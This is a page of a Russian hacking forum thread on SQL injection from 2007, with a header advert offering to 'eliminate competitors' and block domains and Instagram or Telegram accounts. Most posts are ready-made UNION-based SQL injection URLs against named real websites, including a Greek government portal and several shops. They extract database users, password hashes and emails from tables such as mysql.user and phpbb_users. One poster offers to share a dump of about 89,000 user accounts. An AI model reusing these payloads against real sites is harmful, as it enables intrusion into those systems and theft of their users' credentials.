Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 145 из 1242

145

Опции темы

Поиск в этой теме

Опции просмотра

#1441

29.03.2007, 17:01

~~zl0ba~~

Banned

Регистрация: 10.10.2006

Сообщений: 596

Провел на форуме:
2132613

Репутация: 1365

www.reusablebags.com

Цитата:

http://www.reusablebags.com/news.php?id=-7+union+select+1,version(),database(),user(),5,6,7 ,8,9/*

#1442

29.03.2007, 17:07

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Цитата:

http://www.viking.tm/product.php?id=-1%20union%20select%201,2,3,4,5,6,7/*

И шоп какой-то

Цитата:

http://www.proaudio.ru/product.php?id=-7898%20union%20select%201,concat_ws(char(58),passw ord,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19%20from%20users/*

Цитата:

http://www.proaudio.ru/product.php?id=-7898%20union%20select%201,concat_ws(char(58),passw ord,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19%20from%20members/*

#1443

29.03.2007, 17:16

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

e-gov.gr

Код:

http://www.e-gov.gr/article.php?sid=-2818+union+select+1,2,3,4,concat(user,0x3a,password),6,7,8,9+from+mysql.user/*

Код:

http://www.armeniafund.org/press_releases/press_releases.php?id=-127%20UNION%20SELECT%201,user(),3,4,5,6,7/*

#1444

29.03.2007, 18:25

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/*
http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=char(114,101,97,100,101,114,115)+limit+0,1/*
http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,concat(readerid,char(58),readername,char(58),readerbiography),4,5,6,7,8,9,10,11+from+readers/*

#1445

29.03.2007, 18:35

ssk.ex0.uf0

Познающий

Регистрация: 27.02.2007

Сообщений: 89

Провел на форуме:
1141192

Репутация: 195

Отправить сообщение для ssk.ex0.uf0 с помощью ICQ

Вовремя работы наткулся случайно...мож кто захочет поковыряться..)

Цитата:

http://www.adrc.or.jp/nationframe.php?URL=./view_disaster_en.php&NationCode=392&lang=en&KEY=-1

Цитата:

http://lovefm.co.jp/contents/w_main3.php?oya_id=2'

#1446

29.03.2007, 19:25

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Отправить сообщение для Muhacir с помощью ICQ

http://www.mekdep.com/Top/index.php?do=rate&id=19'

#1447

29.03.2007, 20:10

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Код:

http://www.ruscico.com/detail.php?lang=ru&film=-1+union+select+1,2,3,4,5,concat(user,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+mysql.user+limit+1,1/*

апдейт:

Код:

http://ostro.org/shownews_ks.php?id=-1+union+select+1,2,3,4,5/*

на таблицы не везет.. =\

Код:

http://www.fcdynamo.ru/info.php?id=-1'+union+select+concat_ws(0x3a,name,login,pass)+from+users+limit+2,1/*

вывода логина/пасса нет, мб таблица другая, мб еще что...
зато динамо))

Последний раз редактировалось n1†R0x; 29.03.2007 в 21:18..

DivX.it

#1448

29.03.2007, 21:54

Thanat0z

Постоянный

Регистрация: 06.12.2006

Сообщений: 762

Провел на форуме:
5352530

Репутация: 2062

DivX.it

Код:

__http://www.divx.it/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58),user_icq,char(58),user_password),4,5,6,7,8,9%20from%20phpbb_users%20where%20user_id%3E89650%20and%20user_id%3C89654/*

более месяца держал эту скулю в привате, теперь могу выложить

89654 юзверей.
Постараюсь после дамп базы кинуть если кому надо

PS хе, только что посерфил в инете, их уже ломали, в статью углубляться не стал, возможно там чуть другая скуля __http://www.fssr.ru/hz.php?file=article&name=News&sid=6475

Последний раз редактировалось Thanat0z; 29.03.2007 в 22:11..

#1449

29.03.2007, 22:03

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Код:

http://rybalka.zooclub.ru/article.php?id=-1+union+select+table_name,2,3+from+information_schema.tables

ничего интересного =\

#1450

29.03.2007, 22:04

random

Познающий

Регистрация: 05.09.2006

Сообщений: 50

Провел на форуме:
1988972

Репутация: 250

Код:

http://www.forceprotection.net/news/news_article.html?id=-163+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Код:

http://www.comingsoon.net/news/movienews.php?id=-19350+union+select+version()/*

Страница 145 из 1242

145

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход